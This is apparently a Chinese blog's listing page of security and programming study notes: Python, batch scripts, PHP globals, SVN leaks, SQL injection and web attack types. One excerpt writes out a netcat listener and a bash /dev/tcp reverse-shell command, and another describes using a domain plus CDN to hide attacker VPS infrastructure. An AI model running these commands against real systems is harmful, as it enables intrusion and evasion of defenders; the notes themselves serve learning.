摘要: 很久之前,就发现这位大佬的博客干活很多,很好,但是不知怎么的,一直拖着没去学习,收藏了很多博客,还是没怎么去学,总是没学完一样,就去弄另一样,故此,需要静下心来去学习,所有的博客皆为学习之中的笔记,有些的基本和原文差不多,手打笔记,参考链接就不再添加了,没有什么原创内容,比较菜,所以现在学习为主,记 阅读全文
posted @ 2020-08-07 07:31 世人熙熙皆为利来 阅读(182) 评论(0) 推荐(0) 编辑
摘要: 列表(list) 列表是python中的一个对象 对象(object)就是内存中专门用来存储数据的一块区域 列表可以保存多个有序的数据 集合元素之间无序,每个元素唯一,不存在相同元素 集合元素不可更改,不能是可变数据类型 S.addr(x)如果x不在集合中,将x增加到S S.discard(x)移除 阅读全文
posted @ 2020-08-09 10:15 世人熙熙皆为利来 阅读(101) 评论(0) 推荐(0) 编辑
摘要: 很久之前做的笔记了,一直放在notepad++里,放到随笔里 不容易丢 bat批处理 start 打开cmd @echo off 不显示执行过程 建议放置在首行 attrib +h +a +s 给文件加属性 h隐藏文件 a只读 s受保护的系统文件 :后加任何符号表示块 使用goto跳转区块 例: : 阅读全文
posted @ 2020-08-09 10:12 世人熙熙皆为利来 阅读(140) 评论(0) 推荐(0) 编辑
摘要: 利用Domain+CDN隐藏VPS真实IP 引言 在攻防演练中,目标在内网cs上线如果不做任何防护,自己的VPS很容易泄露IP,我们利用简单的域+CDN来做一个简单的隐藏,增加防守溯源的一些难度。 正文 CDN的基本原理是广泛采用各种缓存服务器,将这些缓存服务器分布到用户访问相对集中的地区或网络中, 阅读全文
posted @ 2020-08-02 19:25 世人熙熙皆为利来 阅读(613) 评论(0) 推荐(0) 编辑
摘要: PHP中的全局变量global和GLOBALS的区别 1、global global的作用是定义全局变量,但是这个全局变量不是应用于整个网站,而是应用于当前页面,包括include或require的所有文件。但是在函数体内定义的global变量,函数体内可以使用,在函数体外定义的global变量不能 阅读全文
posted @ 2020-08-01 21:42 世人熙熙皆为利来 阅读(261) 评论(0) 推荐(0) 编辑
摘要: 提权以及反弹shell netcat反弹shell kali中使用nc(netcat)进行监听 用法 : nv -lvvp 2333(端口号) 靶机中使用 bash -c 'bash -i >&/dev/tcp/192.168.1.1/2333 0>&1' 同样可以写成一句话木马进行反弹shell。 阅读全文
posted @ 2020-07-30 22:12 世人熙熙皆为利来 阅读(1578) 评论(0) 推荐(0) 编辑
摘要: SVN源码泄露漏洞 SVN(subversion)是源代码管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用”导出“功能,而是直接复制代码文件夹到WEB 阅读全文
posted @ 2020-07-29 13:53 世人熙熙皆为利来 阅读(375) 评论(0) 推荐(0) 编辑
摘要: 攻击类型 针对前端(客户端)的攻击:钓鱼,暗链,xss,点击劫持,CSRF,URL跳转等问题 针对后端(服务端)的攻击:SQL注入、命令注入、文件上传、文件包含、暴力破解等问题 HTML DOM DOM 是树结构 DOM本质:连接WEB页面和编程语言 可以更直观了解页面元素 最重要的是使用JavaS 阅读全文
posted @ 2020-07-26 22:07 世人熙熙皆为利来 阅读(153) 评论(0) 推荐(0) 编辑
摘要: SQL注入详解 据不完全统计,国内网站ASP+Access或SQLServer占70%以上,PHP+MySQL占20%。 一般asp+access组合比较多,aspx+mssql(SQL Server)组合比较多 查询关键词 查询中用到的关键词主要包含六个,并且他们的顺序依次为selcet--fro 阅读全文
posted @ 2020-07-26 22:05 世人熙熙皆为利来 阅读(384) 评论(0) 推荐(0) 编辑
摘要: URL中的"#"、"?"、"&"号的作用 1、# 一、#的含义 #代表网页中的一个位置,其右面的字符,就是该位置的标识符。比如http://www.example.com/index.html#print就代表网页index.html的print位置。浏览器读取这个URL后,会自动将print位置滚 阅读全文
posted @ 2020-04-05 19:07 世人熙熙皆为利来 阅读(1260) 评论(0) 推荐(0) 编辑